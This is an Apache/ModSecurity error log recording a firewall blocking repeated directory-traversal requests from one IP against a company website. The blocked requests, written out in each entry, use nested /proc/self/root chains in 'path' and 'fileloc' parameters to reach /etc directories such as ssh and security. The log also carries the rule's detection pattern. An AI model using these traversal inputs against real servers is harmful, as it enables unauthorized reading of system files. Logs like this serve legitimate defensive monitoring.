[Mon Mar 16 17:34:01.326967 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.241.46:60576] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpOc_BxrYCr4hPDw8C4wAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:34:03.927866 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:54632] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpO_9ocpUE4ed4uDwL1QAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:05.239153 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:54642] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpPY6lpbStxTqkSkuCgAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:06.445188 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.241.46:54656] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpPkr9dMAiw-8KANNiCgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:34:11.117576 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:54668] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpQ8_BxrYCr4hPDw8C6QAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 17:34:22.130188 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:48268] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpTo6lpbStxTqkSkuCkgAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:23.498870 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.241.46:36518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpT6TCbgAP5jq5TehErgAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:24.727240 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.241.46:36520] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpULABkC4fWIHEf8EODwAAAEg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:26.033346 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:36534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpUrABkC4fWIHEf8EOEQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:27.279093 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.241.46:36550] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpU8_BxrYCr4hPDw8C8gAAAdY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:28.570997 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:46212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpVM_BxrYCr4hPDw8C9gAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:29.756066 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.241.46:46228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpVf9ocpUE4ed4uDwL1wAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:30.935186 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:46230] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpVrysWC90G-1nBrBdXQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:32.234354 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.241.46:46232] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpWI6lpbStxTqkSkuClAAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:34.971509 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:46240] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpWrysWC90G-1nBrBdZgAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:36.209819 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.241.46:46252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpXKTCbgAP5jq5TehEsQAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:37.379487 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:46258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpXVajLEzk2WiQ-10q-QAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:40.494042 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:38472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpYFajLEzk2WiQ-10q_AAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:41.847599 2026] [:error] [pid 14895:tid 140411733534464] [client 74.7.241.46:38486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpYVajLEzk2WiQ-10q_QAAAoE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:44.554191 2026] [:error] [pid 10772:tid 140411590858496] [client 74.7.241.46:38496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpZP9ocpUE4ed4uDwL2gAAAhI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:45.910869 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.241.46:38510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhpZbABkC4fWIHEf8EOGAAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 17:34:47.125927 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:38520] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 